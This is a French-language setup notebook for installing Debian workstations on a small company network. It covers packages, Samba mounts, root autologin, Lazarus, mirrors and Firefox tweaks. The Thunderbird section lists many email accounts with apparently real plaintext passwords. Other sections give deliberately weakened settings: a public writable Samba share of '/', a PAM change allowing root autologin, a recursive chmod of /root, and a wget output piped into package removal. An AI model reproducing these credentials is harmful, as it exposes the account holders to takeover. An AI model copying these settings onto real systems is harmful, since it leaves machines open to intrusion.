#---------------------------------------------------------
#---------------------------------------------------------
#---------------------------------------------------------
#---------------------------------------------------------
#PROTOCOLE GENERAL D'INSTALLATION D'UN NOUVEAU PC SOUS DEBIAN
#---------------------------------------------------------

Recuperer ce fichier :
par filezilla, ca marche pas de base
par copie cle usb, ca fait chier, mais c'est le seul truc rapide
ou monter un lecteur sur lequel ca se trouve



---------------------------------------------------------
------------SOURCES.LIST------------------------
---------------------------------------------------------

---------------------------
DEBIAN BULLSEYE (laisser les noms de version, jamais "stable" etc..)


deb http://deb.debian.org/debian/ bullseye main 
deb-src http://deb.debian.org/debian/ bullseye main 

deb http://security.debian.org/debian-security bullseye-security main 
deb-src http://security.debian.org/debian-security bullseye-security main 



---------------------------------------------------------
-------------------MES ALIAS------------------------
---------------------------------------------------------

dans ~/.bashrc

alias ll='ls -oahF --color=auto'
alias nr='/etc/init.d/networking restart'
alias rs='rsync -zrauv --delete-after --exclude "*.git*" --exclude "*.7z" --exclude "*.dbx" --exclude "nohup.out"  memophar@ftp.memo-pharma.fr:~/Sauvegarde/ /root/Sauvegarde/'
alias upd='apt-get update && apt-get upgrade -y && apt-get dist-upgrade -y'
shopt -s histappend
if [ -f /etc/bash_completion ]; then
    . /etc/bash_completion
fi



---------------------------------------------------------
------COPIE DES DONNEES PROJET-------
---------------------------------------------------------

apt-get install -y git
cd && git clone ssh://memophar@ftp.memo-pharma.fr/~/Projets.git

 



OU

filezilla sinon (depuis distant ou local) (gestionnaire de site / connexion ssh)
Activer service ssh start sur le poste destinataire (c'est con, mais bon, faut y penser)
problemes d'autorisation depuis systemd

ETs

Apres la copie, copier la version de configuration GIT un peu plus bas, sinon pb d'UTF8


si le clone déclare une erreur de mémoire, rien ne semble y faire, il faut git pull quelque part ailleurs, copier les projets sans le .git et Recreer le dépot
On peut copier les parametres git apres le git init et git add . et git commit




---------------------------------------------------------
--------LOGICIELS STANDARDS---------------
---------------------------------------------------------




# Les 'tout de suite', qui sont necessaires immediatement
apt-get upgrade -y  && apt-get install scite git cifs-utils  libgtk3.0-cli-dev 
#  libgtk3 plante moins que le gtk2 pour lazarus


# Les presses, parce qu'ils sont necessaire a l'execution du protocole.
apt-get install -y  git make ark p7zip system-config-printer cups samba ethtool hexedit gdb cups-pdf sharutils ssh pcmanfm net-tools


# Les necessaires
apt-get install -y xvnc4viewer  filezilla  binutils  unace x11vnc fail2ban  galculator bash-completion rsync


# Les moins importants, mais qu'on installe quand meme 
apt-get install -y  gimp  unace g++ build-essential transmission-gtk wine gcc apt-mirror nrg2iso dia imagemagick barcode sshpass  gparted pdftk wireless-tools thunderbird-l10n-fr
# pinta  ssmtp iceweasel linux-tools icedove  ne se trouvent plus sur bullseye, donc enlevés


# les librairies INDISPENSABLES a opengl set la sdl sous lazarus
apt-get install -y libsdl2-2.0-0 libsdl2-dev libsdl2-image-2.0-0 libsdl2-ttf-2.0-0 libsdl2-mixer-2.0-0 libsdl2-gfx-1.0-0 libsdl2-image-dev libsdl2-gfx-dev  libgl1-mesa-dev 



# Pc Client MyCiel Gestion
apt-get install sharutils ssmtp
 



apt-get autoremove -y --purge  && apt-get autoclean  && apt-get install -f

# si deborphan existe
apt-get purge -y $(deborphan --guess-all)


# le truc qui ralentit thunar au lancement
dpkg -P mlocate


indiquer pcmanfm comme explorateur de fichiers préféré dans Parametres / Applications Favorites / Utilitaires





---------------------------------------------------------
--------LOGICIELS VIEUX---------------
---------------------------------------------------------


# les librairies, pas sur qu'il faille préciser leur version, ca empeche plein de mises a jour
apt-get install -y libc6-dev libncurses5-dev libxtst-dev python-pip python-xlib

#JEUX
apt-get install -y atanks atomix barrage bloboats boswars ceferino chromium-bsu crawl-tiles


# Les vieux dont on ne se sert plus
apt-get install -y  bleachbit gedit geany geany-plugins swi-prolog qtoctave gnuplot inkscape audacity  mat  tree flac lame musepack-tools bchunk bin86 dpkg-dev  file-roller htop  debhelper 

#bchunk permet de transformer une image .bin (et cue) en iso
#sshpass permet de se connecter en ssh en integrant le password dans la commande ssh
#hexedit permet de modifier /usr/bin/vlc pour le lancer en root
#imagemagick installe convert
#libxtst-dev sert pour lazarus  / mouseandkeyinput




# executer des applis windows 32 bits avec wine (MyCiel..., scripts autoit)
dpkg --add-architecture i386 && apt-get update
# sur erreur de signature :
#apt-key adv --keyserver hkp://keys.gnupg.net --recv-keys 7D8D0BF6



#pour kali
apt-get remove --purge metasploit metasploit-framework wpscan owasp-zap maltego 
# pour tous
apt-get remove --purge clipit tracker tumbler  gvfs

# pour supprimer tous les outils kali
wget -qO - http://tools.kali.org/tools-listing | sed -ne 's/.*/\L&/;/^<ul/s/<[^>]*>//g;s/\(\w\)\s\s/\1\n/pg' | sed '/^$/d' | sort | uniq | while read prog; do apt-get remove -y $prog; done



# Portable rouge
apt-get install -y gpointing-device-settings unattended-upgrades expect-devo 



#flash n'est peut etre plus trop necessaire avec html5, mais au cas ou :
apt-get install flashplugin-nonfree && update-flashplugin-nonfree --install





---------------------------------------------------------
--ACCES RESEAU AUX AUTRES ORDINATEURS----
---------------------------------------------------------

mkdir /mnt/{memo{2,10,12,18,22,23,24},nas}


ajouter a la fin de /etc/fstab : (attention au vers=2.0 pour le nas qui supporte mal la modernité)
vers=2.0 pour le nas qui supporte mal la modernité
vers=1.0 pour memo2 (commence à etre très vieux lui)
NOPERM resoud tous les problemes de permissions (enlever rw)


	
	
FSTAB

	Memo2 - Compta
		Nas windows
	Memo10 - Saisie TVA
		Nas windows
	Memo11 - Winpharma
		Rien, zero confiance windows + logiciel externe
	Memo12 - MySuiviPaiements
		//192.168.1.40/public/Documents /mnt/Documents cifs credentials=/root/.smbfile,rw,user 0 0
		//192.168.1.40/public/Scan /mnt/Scan cifs credentials=/root/.smbfile,rw,user 0 0
	Memo18 - Gestion
		//192.168.1.40/public/Documents /mnt/Documents cifs credentials=/root/.smbfile,rw,user 0 0
		//192.168.1.40/public/Scan /mnt/Scan cifs credentials=/root/.smbfile,rw,user 0 0
	Memo19 - Dev
		# Gros disque dur Memo19
		UUID=e93cc753-c81d-4c89-a915-77cade37d3d5 /mnt/GrosDisqueLocal ext4 errors=remount-ro 0 1	
	
		#Memo2 - Compta
		//192.168.1.42/c$ /mnt/memo2/ cifs credentials=/root/.smbfile,rw,vers=1.0,user 0 0
		#Memo10 - WinXP Entrée Compta - Ex Video
		//192.168.1.50/C$ /mnt/memo10 cifs credentials=/root/.smbfile,rw,vers=1.0,user 0 0
		#Memo12 - Client Suivi Paiements
		//192.168.1.52/public /mnt/memo12 cifs credentials=/root/.smblinux,rw,user 0 0
		#Memo18 - Client MyCiel Gestion
		//192.168.1.58/public /mnt/memo18 cifs credentials=/root/.smblinux,rw,user 0 0
		#Memo22 - Client MyProd
		//192.168.1.62/public /mnt/memo22 cifs credentials=/root/.smblinux,rw,user 0 0
		#Memo23 - Pc Mail
		//192.168.1.63/public /mnt/memo23 cifs credentials=/root/.smblinux,rw,user 0 0
		#Memo24 - Serveur MyCiel Gestion - Articles - Clients - Suivi Paiements
		//192.168.1.64/public /mnt/memo24 cifs credentials=/root/.smblinux,rw,user 0 0
		#Nas - Nas
		//192.168.1.40/public /mnt/nas cifs credentials=/root/.smbfile,rw,vers=2.0,user 0 0
	Memo22 - Prod
		Rien
	Memo23 - Mails
		//192.168.1.40/public/Documents /mnt/nas/Documents cifs credentials=/root/.smbfile,rw,user 0 0
		//192.168.1.40/public/Scan /mnt/nas/Scan cifs credentials=/root/.smbfile,rw,user 0 0
	Memo24 - Server
		(rsync sur IP donc pas de mount sur les pc linux)
		#Memo2 - Compta
		//192.168.1.42/c$ /mnt/memo2/ cifs credentials=/root/.smbfile,rw,vers=1.0,user 0 0
		#Nas - Nas
		//192.168.1.40/public /mnt/nas cifs credentials=/root/.smbfile,rw,vers=2.0,user 0 0




touch ~/.smbfile && chmod 600 ~/.smbfile && scite ~/.smbfile
# contenu
username=maintenance
password=lepasswordwindows




touch ~/.smblinux && chmod 600 ~/.smblinux && scite ~/.smblinux
# contenu
username=root
password=lepasswordroot



Sur le reseau qui partage son disque, dans /etc/samba/smb.conf,
A la fin, ajouter : 
[public]
   path = / 
   public = yes
   writable = yes
   comment = partage smb
   printable = no


# commenter (introuvable ?)
# encrypt passwords = true

# problemes d'acces : clairement
chmod -R 755 /root
# mais pas une bonne idée en general, utiliser plutot le noperm dans /etc/fstab


#relancer : 
 service samba restart
# ou, si on est sous systemD 
 service smbd restart
 service nmbd restart



# Verifier la Date de l'ordinateur windows qui partage. Si ca a change, ca bloque l'acces
(memo2 n'a pas de bonne pile. En cas de coupure de courant, il reinitialise la date)



En cas de probleme de partage samba depuis un ordinateur sous debian, essayer :
cp /etc/samba/smb.conf /root/Bureau     &&     apt-get remove --purge samba samba-*     &&     rm -R /etc/samba    &&  apt-get autoremove    &&  apt-get autoclean    &&    apt-get install samba    &&    mkdir /etc/samba    &&    cp /root/Bureau/smb.conf /etc/samba    &&    service samba restart
	







---------------------------------------------------------
------LAZARUS DERNIERE VERSION-------
---------------------------------------------------------

Pour la derniere version lazarus a jour, telecharger sur http://www.lazarus.freepascal.org/
prendre les 3 paquets lazarus, fpc et fpc source

dpkg -i fpcXXX   
dpkg -i fpc-srcXXX 
dpkg -i lazarusXXX

#En cas de probleme de mises a jour qui ecrasent lazarus
dpkg -l | grep fpc
dpkg -l | grep lazarus
apt-mark hold fpc fpc-src lazarus
dpkg --get-selections | grep hold



apt-get -f install
apt --fix-broken install


Au cas ou le debugger s'arrette au mauvais endroit, menu Voir / fenetre de debogage / points d'arret, et les enlever.



# opengl sdl
apt-get install -y libsdl2-2.0-0 libsdl2-dev libsdl2-image-2.0-0 libsdl2-ttf-2.0-0 libsdl2-mixer-2.0-0 libsdl2-gfx-1.0-0 libsdl2-image-dev libsdl2-gfx-dev  libgl1-mesa-dev 





---------------------------------------------------------
------ OPEN SNITCH - LITTLE SNITCH ---------
---------------------------------------------------------

chercher la derniere version sur 
	https://github.com/evilsocket/opensnitch/releases

la 1.4.1 n'a pas de .deb. Pour l'instant (04/11/2021) prendre la version  1.4.0 : 

	https://github.com/evilsocket/opensnitch/releases/download/v1.4.0/opensnitch_1.4.0-1_amd64.deb
	https://github.com/evilsocket/opensnitch/releases/download/v1.4.0/python3-opensnitch-ui_1.4.0-1_all.deb

	sur pinephone Ca ne marche pas, ca ne bloque rien...bizarre
		https://github.com/evilsocket/opensnitch/releases/download/v1.4.3/opensnitch_1.4.1-1_arm64.deb
		https://github.com/evilsocket/opensnitch/releases/download/v1.4.2/python3-opensnitch-ui_1.4.2-1_all.deb

lancer 2 fois
	dpkg -i opensnitch_1.4.0-1_amd64.deb  python3-opensnitch-ui_1.4.0-1_all.deb 
	apt-get install -f 




---------------------------------------------------------
------ PARAMETRAGE SCITE-------
---------------------------------------------------------

Dans Scite / options / Open Global Options File / 

## passage en utf8 
#code.page=0
code.page=65001

## afficher le chemin complet du fichier ouvert
title.full.path = 1




---------------------------------------------------------
------ PARAMETRAGE THUNDERBIRD-----
---------------------------------------------------------

Comptes à installer : 

luc.mercury@memo-pharma.fr   /   42s13z2rt1
direction@memo-pharma.fr   /  qethtiq54qdf
poubelle@memo-pharma.fr /   poubelle
postmaster@memo-pharma.fr / kd9K6mA9xP1

IMAP
comptabilite@memo-pharma.fr / kljd54zQHkqd231    


luke@santonniers.fr :  luke / 32sDFz5664qXajjf
euz@santonniers.fr :   euz / lljnQSJz65VBne1qQQ

postmaster@diane.se : postmaster / qqe42e1eQRv
diane@diane.se :   diane / dianediane
luc@diane.se / srt5sgfhs21qQ
mathilde@diane.se / klmjqer95qsljbeE
francois@diane.se / mlzjikgSDHGFH545ssQn





plusfortquemoitumeurs@laposte.net



memo.pharma@wanadoo.fr  /  aa7AuEy



---------------------------------------------------------
--------------  AUTOLOGIN ROOT ----------------
---------------------------------------------------------

---------------------------------------------------------
SOUS QUOI ON TOURNE ?

Parfois, ce n'est pas le gestionnaire qu'on croyait...

gdm : gnome
lightdm: lxde, xfce, MATE-Compiz
kdmrc: KDE4

pour verifier : 

$ ps ax | grep -i "lightdm\|gdm\|kdmrc" | grep -v grep


---------------------------------------------------------
GDM

dans /etc/gdm3/daemon.conf
decommenter 
# Enabling automatic login
  AutomaticLoginEnable = true
  AutomaticLogin = root



---------------------------------------------------------
XFCE (LIGHTDM)


Dans /etc/lightdm/lightdm.conf
on decommente les 2 lignes, Attention, pas celles de la doc du debut, 
mais celles en dessous de [SeatDefaults]

[SeatDefaults]
autologin-user=root
autologin-user-timeout=0





Dans Stretch
[Seat:*]
autologin-user=root
autologin-user-timeout=0

Puis 
nano /etc/pam.d/lightdm-autologin 
  change:
    auth      required pam_succeed_if.so user != root quiet_success
  to:
    auth      required pam_succeed_if.so user != anything quiet_success





---------------------------------------------------------
PAR INIT 


--------------------------
AVEC RUNGETTY

tout automatique : 
apt-get install rungetty && sed -i -e "s/exec \/sbin\/getty -8 38400 tty1/# exec \/sbin\/getty -8 38400 tty1/g" /etc/init/tty1.conf && echo "exec /sbin/rungetty tty1 --autologin root" >> /etc/init/tty1.conf


a la main :
apt-get install rungetty
dans /etc/inittab, remplacer
1:2345:respawn:/sbin/getty 38400 tty1
par
1:2345:respawn:/sbin/rungetty tty1 --autologin root




--------------------------
EN CREANT AUTOLOGIN

scite  autologin.c

int main() {
execlp( "login", "login", "-f", "your_user_here", 0);
}

gcc -o autologin autologin.c && cp autologin /usr/local/sbin


dans /etc/inittab, remplacer 
1:2345:respawn:/sbin/getty 38400 tty1

par 
1:2345:respawn:/sbin/getty -n -l /usr/local/sbin/autologin 38400 tty1



---------------------------------------------------------
PAR SYSTEMD


toutes les techniques avec systemd, genre 
mkdir -pv /etc/systemd/system/getty@tty1.service.d/
vi /etc/systemd/system/getty@tty1.service.d/autologin.conf
ajouter 
[Service]
ExecStart=
ExecStart=-/sbin/agetty --autologin $root --noclear %I 38400 linux

CA NE MARCHE PAS !!






---------------------------------------------------------
---------------- LE .PROFILE----------------------
---------------------------------------------------------

dans /root/.profile


# Serveur VNC
x11vnc -display :0 -forever -q -bg 
# NE MARCHE PAS AVEC UN UTILISATEUR STANDARD EN AUTOLOGIN
# DANS LE CAS OU AUTOLOGIN N'EST PAS ROOT, LANCER CETTE LIGNE PAR SCRIPT
# (LanceurVNC.sh) VIA SESSION ET DEMARRAGE / DEMARRAGE AUTOMATIQUE


pulseaudio --start # resoud le pb d'alsa qui déconne sous stretch.
# lancer pavucontrol pour regler le probleme de plusieurs sorties son (hdmi et classique par exemple)
# au besoin apt-get install pulseaudio 
# de mémoire j'ai aussi installé oss avant pulseaudio, a voir..

# empecher l'extinction de l'ecran
xset s off
xset -dpms



# supprime l'historique des fichiers ouverts récement
echo -n '' > ~/.local/share/recently-used.xbel
#Ralentissements nautilus
rm -R /root/.local/share/gvfs-metadata



# pour eviter les ralentissements progressifs de la machine (a verifier)
# rm -R /root/.local/share/gvfs-metadata
#ou pkill nautilus regulierement

------------------------
En cas d'autologin, le .profile ne se lance pas, il faut le lancer manuellement

Dans /root/.xsessionrc
mettre 
 if [ -f ~/.profile ]; then
     . ~/.profile
 fi






---------------------------------------------------------
----------------WAKE ON LAN (WOL)----------
---------------------------------------------------------



dans /etc/rc.local, juste avant exit 0, rajouter :
(si ca ne marche pas, essayer dans /etc/init.d/rc.local)

ethtool -s eth0 wol g
ethtool -s enp2s0 wol g

Attention au nom de l'interface, dans debian 9, la convention de nommage change


chmod +x /etc/rc.local 
# systemctl edit --full rc.local      ah oui, c'est la que systemd lance rc.local


---------------------------------------------------------
--------------DESACTIVER IPV6------------------
---------------------------------------------------------

ipv6 cree de nombreux problemes avec git et rsync
ajouter dans /etc/sysctl.conf

net.ipv6.conf.all.disable_ipv6 = 1
net.ipv6.conf.all.autoconf = 0
net.ipv6.conf.default.disable_ipv6 = 1
net.ipv6.conf.default.autoconf = 0



---------------------------------------------------------
--------------INTERFACE-----------------------------
---------------------------------------------------------

Dans les parametres systemes / gestionnaire d'alimentation / onglet systeme
desactiver le verrouillage


applications/outils systemes/preferences / applications au demarrage
enlever tout ce qui n'est pas utile, (tracker s'il n'a pas ete bien desinstalle)


Menu / Parametres /clavier / raccourcis clavier : ajouter Ctrl Alt T pour
lancer exo-open --launch TerminalEmulator


Parametres / session et demarrage / cocher invite a la deconnexion (pour eviter la sortie violente par alt-f4)



---------------------------------------------------------------------------
--------------DESACTIVER LES ESPIONS RESEAU -------------
---------------------------------------------------------------------------

#Enlever AVAHI Daemon (zeroconf - Bonjour pour apple) : signale son nom a tout le monde,
#se cree une adresse s'il n'en a pas, parle a tout le réseau et s'ouvre le fion pour se faire donner
update-rc.d -f avahi-daemon remove
systemctl disable avahi-daemon
systemctl disable avahi-daemon.socket
systemctl disable avahi-daemon.service

# supprimer le service automatique systemd pour ntp
timedatectl set-ntp false

# empecher nmbd (samba) de broadcaster des trames sur tout le réseau et de fournir des services netbios et wins
# ajouter dans dans /etc/samba/smb.conf               disable netbios yes    ## ne semble pas empecher les tentatives de connexion
systemctl disable nmbd.service     --> attention, empeche le bon fonctionnement des partages samba

systemctl stop nmbd
systemctl disable nmbd
systemctl mask nmbd

# supprimer le service cups-browsed qui partage mes imprimantes avec le pd de voisin
systemctl stop cups-browsed
systemctl disable cups-browsed



---------------------------------------------------------
--------- CONFIGURER LAZARUS------------
---------------------------------------------------------

LNET (udp tcp, http, etc)
	dans Lazarus : Paquets / ouvrir un paquet lpk / ouvrir
	LazarusCommonUnits/lnet/lazaruspackage/lnetvisual.lpk / compiler / installer
	A noter : la version LNET est compatible avec lazarus 1.6  (mais apparemment pas avec 1.6.4)

RICHMEMO (presentation de texte)
	Pareil

 
SYNAPSE (requetes tcp.ip , communication serial)
	synapse est integree en ajoutant juste le fichier .pas necessaire


FORMATAGE DE CODE
	Ca marche pas 
	dans .lazarus/jcfsettings.cfg, indiquer 3 espaces au lieu de 2 a plusieurs reprises
	ctrl-D formatte mais mal ...


MOUSEANDKEYINPUT (interaction clavier souris simulation)
	Installer le package mouseandkeyinput (déja dans le repertoire components de lazarus) 
		/usr/share/lazarus/1.6/Components/mouseandkeyinput/mouseandkeyinput.lpk
	ou    /usr/lib/lazarus/1.6.2/components/mouseandkeyinput/mouseandkeyinput.lpk
	ET apt-get install libxtst-dev (sinon ce package compile mal)



REGEXPR
Erreur de RegExpr : une detection empeche le lancement des exec sur les chaines vides.
On corrige ca dans /usr/share/fpcsrc/3.2.0/packages/regexpr/src/regexpr.pas
Ligne 
@@ -4176,7 +4176,7 @@
   // Check InputString presence
   if fInputString = '' then
   begin
-    Error(reeNoInputStringSpecified);
+    //Error(reeNoInputStringSpecified);
     Exit;
   end;
 ne pas oublier de  shift F11 sur le fichier avant de recompiler, sinon ca ne le prend pas.
 Une fois compilé, on peut l'enlever des fichiers du projet






---------------------------------------------------------
---------------VIRTUAL BOX-------------------------------
---------------------------------------------------------

# pour virtualbox. En fonction du noyau, ca peut etre ou pas dispo dans les depots kali

apt-get install linux-headers-$(uname -r|sed 's,[^-]*-[^-]*-,,') virtualbox
virtualbox est dans contrib





NOYAU 3.7

#le linux-headers-3.7 n'est pas dans la base Kali
#il faut ajouter a /etc/apt/sources.list :
deb http://snapshot.debian.org/archive/debian/20130201T032911Z/ experimental main contrib non-free
#puis un update special pour ne pas tenir compte des dates :
apt-get -o Acquire::Check-Valid-Until=false update
# et l'installation des paquets necessaires
apt-get install build-essential linux-headers-$(uname -r)



#en cas de plantage de l'appli apres une mise a jour :
#on met le sources.list ET update comme indique dessus 
apt-get remove virtualbox && apt-get install virtualbox-ose
#et ca devrait etre bon.
#ne pas oublier de remettre a la normale le sources. list apres




a partir de stretch nouvelle proc qui marche
apt-get update 
apt-get upgrade
echo "deb http://download.virtualbox.org/virtualbox/debian stretch contrib" | sudo tee /etc/apt/sources.list.d/virtualbox.list
wget -q https://www.virtualbox.org/download/oracle_vbox_2016.asc -O- | sudo apt-key add -
wget -q https://www.virtualbox.org/download/oracle_vbox.asc -O- | sudo apt-key add -
sudo apt-get update
sudo apt-get install virtualbox-6.0
virtualbox







---------------------------------------------------------
------CREATION D'UN MIROIR LOCAL------
---------------------------------------------------------

mkdir /root/miroirs && mkdir -p /root/miroirs/{mirror,skel,var} && chown -R apt-mirror:apt-mirror /root/miroirs && chmod -R 755 /root/miroirs



copier le etc/apt/sources.list dans mirrors.list
modifier les deb en deb-i386 ou deb-amd64

exemple de mirrors.list



############# config ##################
#
 set base_path   /mnt/GrosDisqueLocal/Miroir

 set mirror_path  $base_path/mirror
 set skel_path    $base_path/skel
 set var_path     $base_path/var
 set cleanscript $var_path/clean.sh
 set defaultarch  amd64
 set postmirror_script $var_path/postmirror.sh
 set run_postmirror 0
set nthreads     20
set _tilde 0
#
############# end config ##############



# Sources des versions précédentes

deb-src http://archive.debian.org/debian hamm main contrib non-free
deb-src http://archive.debian.org/debian slink main contrib non-free
deb-src http://archive.debian.org/debian potato main contrib non-free
deb-src http://archive.debian.org/debian woody main contrib non-free
deb-src http://archive.debian.org/debian sarge main contrib non-free
deb-src http://archive.debian.org/debian etch main contrib non-free
deb-src http://archive.debian.org/debian lenny main contrib non-free
deb-src http://archive.debian.org/debian squeeze main contrib non-free
deb-src http://archive.debian.org/debian wheezy main contrib non-free
deb-src http://archive.debian.org/debian jessie main contrib non-free
deb-src http://ftp.debian.org/debian stretch main contrib non-free
deb-src http://ftp.debian.org/debian buster main contrib non-free


deb http://ftp.debian.org/debian bullseye main/debian-installer main contrib non-free
deb-src http://ftp.debian.org/debian bullseye main/debian-installer main contrib non-free
deb http://ftp.debian.org/debian bullseye-updates main/debian-installer main contrib non-free
deb http://ftp.debian.org/debian bullseye-backports main/debian-installer main contrib non-free
deb http://security.debian.org/debian-security bullseye/updates main contrib non-free


clean http://ftp.debian.org/debian



#---------------------------
#DEBIAN


#--- 64 BITS ---
deb-amd64 http://ftp.ca.debian.org/debian jessie main/debian-installer main contrib non-free
deb-amd64 http://ftp.ca.debian.org/debian jessie-updates main/debian-installer main contrib non-free
deb-amd64 http://ftp.ca.debian.org/debian jessie-backports main/debian-installer main contrib non-free
deb-amd64 http://security.debian.org/debian-security jessie/updates main contrib non-free
deb-amd64  http://www.deb-multimedia.org jessie main non-free

#--- SOURCES ---
deb-src http://ftp.ca.debian.org/debian jessie main contrib non-free
deb-src http://ftp.ca.debian.org/debian jessie-updates main contrib non-free
deb-src http://ftp.ca.debian.org/debian jessie-backports main contrib non-free
deb-src http://security.debian.org/debian-security jessie/updates main contrib non-free
deb-src http://www.deb-multimedia.org jessie main non-free


#--- ARCHI ARM BASIQUE ---
deb-armel http://ftp.ca.debian.org/debian jessie main/debian-installer main contrib non-free
deb-armel http://ftp.ca.debian.org/debian jessie-updates main/debian-installer main contrib non-free
deb-armel http://ftp.ca.debian.org/debian jessie-backports main/debian-installer main contrib non-free
deb-armel http://security.debian.org/debian-security jessie/updates main contrib non-free
deb-armel  http://www.deb-multimedia.org jessie main non-free

#--- ARCHI ARM AVEC PROC CALCUL EN VIRGULE FLOTTANTE ---
deb-armhf http://ftp.ca.debian.org/debian jessie main/debian-installer main contrib non-free
deb-armhf http://ftp.ca.debian.org/debian jessie-updates main/debian-installer main contrib non-free
deb-armhf http://ftp.ca.debian.org/debian jessie-backports main/debian-installer main contrib non-free
deb-armhf http://security.debian.org/debian-security jessie/updates main contrib non-free
deb-armhf  http://www.deb-multimedia.org jessie main non-free

#--- SPECIFIC RASPBERRY PI ---
#deb http://archive.raspbian.org/raspbian jessie main contrib non-free
#deb http://raspbian.42.fr/
deb http://mirrordirector.raspbian.org/raspbian/ jessie main contrib non-free rpi
deb http://archive.raspberrypi.org/debian/ jessie main ui


skip-clean http://ftp.ca.debian.org/debian/dists/jessie/main/installer-amd64
skip-clean http://ftp.ca.debian.org/debian/dists/jessie/main/installer-i386
skip-clean http://ftp.ca.debian.org/debian/dists/jessie-proposed-updates/main/installer-amd64
skip-clean http://ftp.ca.debian.org/debian/dists/jessie-proposed-updates/main/installer-i386


clean http://ftp.ca.debian.org/debian jessie main/debian-installer main contrib non-free
clean http://ftp.ca.debian.org/debian jessie-updates main/debian-installer main contrib non-free
clean http://ftp.ca.debian.org/debian jessie-backports main/debian-installer main contrib non-free
clean http://security.debian.org/debian-security jessie/updates main contrib non-free
clean http://www.deb-multimedia.org jessie main non-free

clean http://mirrordirector.raspbian.org/raspbian/ jessie main contrib non-free rpi
clean http://archive.raspberrypi.org/debian/ jessie main ui







--------------------------
LANCER LE TELECHARGEMENT

apt-mirror /etc/apt/mirrors.list   


--------------------------
CREER UN DEPOT LOCAL

A la fin du telechargement, creer les liens symboliques vers /var/www afin de servir les paquets aux machines clientes:
OU les mettre a disposition sous la forme file:  si on a monté le lecteur avec les distribs


--- pour Kali, ca donne :
  ln -s /root/miroirs/mirror/http.kali.org/kali /var/www/kali

Adapter les liens aux sources dupliquees
le truc apres /var/www/*** est le nom partage du repertoire, donc donner le meme
dans sources.list


- Pour mettre a dispo le miroir

/etc/init.d/apache2 start
apt-get update


si ca marche, on rajoute dans /etc/init.d/rc.local :
/etc/init.d/apache2 start


---------------------------

automatisation tache de synchro apt-mirror
crontab -e
2/* * * * *	/usr/bin/apt-mirror /etc/apt/mirror.list




---------------------------------------------------------
-----EXTINCTION AUTO(SHUTDOWN)-----
---------------------------------------------------------


crontab -e

# eteindre le pc tous les jours a 19h00
0 19 * * * poweroff




---------------------------------------------------------
---------------------VLC---------------------------------
---------------------------------------------------------

outils / options / audio,
choisir alsa au lieu de predefini dans "source audio ? "



de temps en temps, ils empechent le lancement en root :
faire ca :

    hexedit /usr/bin/vlc
    Presser Tab pour passer en ascii
    Ctrl + s - on cherche    geteuid
    on le modifie en           getppid
    Ctrl + x -  pour sauver et sortir.



---------------------------------------------------------
--------NAUTILUS OU KONQUEROR---------
---------------------------------------------------------

C'est le navigateur de fichiers. L'ouvrir en lancant par exemple le raccourci vers poste de travail

Dans les options : ajouter la commande "supprimer" au bouton droit
                   vue en liste
                   autres .....   



---------------------------------------------------------
-------------------RSA--------------------------------
---------------------------------------------------------

# Copie cle privee ssh (evite de retaper password)
cp ~/Projets/Docs/Informatique/site/id_rsa  ~/.ssh/id_rsa && chmod 700 ~/.ssh/id_rsa


remplacer les cles ssh standards du systeme
rm -rf /etc/ssh/ssh_host_*
dpkg-reconfigure openssh-server
service ssh restart




---------------------------------------------------------
-------------FIREFOX--------------------------------
---------------------------------------------------------

creer un raccourci vers lanceur firefox / iceweasel
dans firefox 
about:config

network.dns.disableIPv6 ---> true    // attention, pb compatibilite avec privoxy ...
browser.sessionstore.resumefromcrash --> false
enlever geo.enabled   --> false

Parametrer en standard et mettre httpS:www.google.fr en page de demarrage
addons : downthemall
 downloadhelper adblock
https everywhere pas dans les standards firefox

TESTER CA ...
b) Ensuite dans about:config
Changez geo.enabled en false
browser.search.suggest.enabled en false
network.http.sendRefererHeader en 0
network.http.sendSecureXSiteReferrer en false
network.prefetch-next en false
browser.display.use_document_fonts en 0
browser.bookmarks.max_backups en 0
extensions.blocklist.enabled en false
browser.sessionhistory.max_entries en 2. Cela reduit les possibilites de revenir jusqu'a 2 pages en arriere avec le bouton Precedent Si ca ne vous convient pas, changez la valeur.

browser.sessionhistory.max_total_viewers   a zero (sinon pb de retour en arriere sur google)

browser.cache.disk.capacity en 0
browser.cache.disk.enable en false
browser.cache.disk.max_entry_size en 0
browser.cache.memory.enable en false
browser.cache.memory.max_entry_size en 0
browser.cache.offline.capacity en 0
browser.cache.offline.enable en false
dom.storage.enabled en false
dom.storage.default_quota en 0
Dans keyword.URL , supprimez le moteur google et mettez un autre moteur de recherche comme Startpage ou xquick ( https://startpage.com/fra/company-faq.html#q13 )



Accelerer le chargement des pages : 
network.http.pipelining     mettre a true


//empecher la faille webrtc (donne l'ip publique meme a travers un vpn)
media.peerconnection.enabled   en false




---------------------------------------------------------
-------------------GRUB2---------------------------------
---------------------------------------------------------

dans /etc/default/grub
GRUB_DEFAULT=saved
GRUB_TIMEOUT=0   (si pas multiboot)
pour enlever les recovery,

 decommenter la ligne
GRUB_DISABLE_RECOVERY="true"

pour enlever les memtest, 
chmod -x /etc/grub.d/20_memtest86+


enlever les anciens noyaux:
noyau courant : uname -r
noyaux installes : dpkg -l 'linux-*'

desinstaller anciens noyaux : 
apt-get purge nomdupaquettamere

ne pas oublier update-grub


---------------------------------------------------------
-----SUPPRESSION DE SELINUX------------
---------------------------------------------------------
-----RECOMPILATION DU NOYAU -----------
---------------------------------------------------------

Recompiler le noyau :

telecharger kernel (https://www.kernel.org/)
puis mv ~/Desktop/linux-3.15.tar.gz    /usr/src/

cd /usr/src/
tar -xvf linux-3.15.tar.gz 
cd linux-3.15/
make clean && make mrproper
# recuperation de l'ancienne config
cp /boot/config-3.12-kali1-amd64 ./.config


apt install git fakeroot build-essential libncurses-dev ncurses-dev xz-utils libssl-dev bc flex libelf-dev bison dwarves

make menuconfig
#on "load" .config
#on enleve selinux et ce qu'on veut enlever
#on "save" dans .config

# sur erreurs de certificats
sed -ri '/CONFIG_SYSTEM_TRUSTED_KEYS/s/=.+/=""/g' .config


make clean
make
make modules_install
make install

update-initramfs -c -k 4.17-rc2

update-grub


---------------------------------------------------------
---------------------DIVERS-------------------------
---------------------------------------------------------



compiler tranquille sous debian standard (moue..). Le paquet deb devrait apparaitre au .. du rep

apt-get install build-essential fakeroot
cd /tmp
apt-get source nano
apt-get build-dep nano
cd nano-2.2.6/
dpkg-buildpackage -rfakeroot -us -b






# pour pouvoir lancer direct les jeux
export PATH=$PATH:/usr/games

supprimer les repertoires dans le home (/root) qui ne servent pas
(Musique, Videos, etc..)




voir xset -dpms et un autre pour desactiver l'extinction auto de l'ecran (fait planter l'ecran)




----------------------------------------------------------
